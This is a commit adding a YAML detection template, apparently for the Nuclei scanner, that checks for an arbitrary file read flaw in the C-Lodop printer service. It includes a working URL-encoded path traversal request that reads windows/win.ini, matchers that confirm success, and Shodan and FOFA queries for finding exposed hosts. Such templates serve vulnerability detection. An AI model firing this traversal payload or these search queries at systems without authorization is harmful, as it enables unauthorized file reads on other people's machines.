Create clodop-printer-lfi.yaml

http/vulnerabilities/other/clodop-printer-lfi.yaml

@@ -0,0 +1,40 @@
+id: clodop-printer-lfi
+
+info:
+  name: C-Lodop Printer - Arbitrary File Read
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    The C-Lodop printer has an arbitrary file reading vulnerability. By constructing a special URL, it can read any file in the system.
+  reference:
+    - https://github.com/Threekiii/Awesome-POC/blob/8e4f0be1f75a71cffe4b2c2c558ad1cd4d03d9a7/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/C-Lodop%E6%89%93%E5%8D%B0%E6%9C%BA%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    max-request: 1
+    shodan-query: title:"Welcome to C-Lodop"
+    fofa-query: title="C-Lodop"
+    verified: true
+  tags: c-lodop,lfi,printer,iot
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+
+      - type: status
+        status:
+          - 200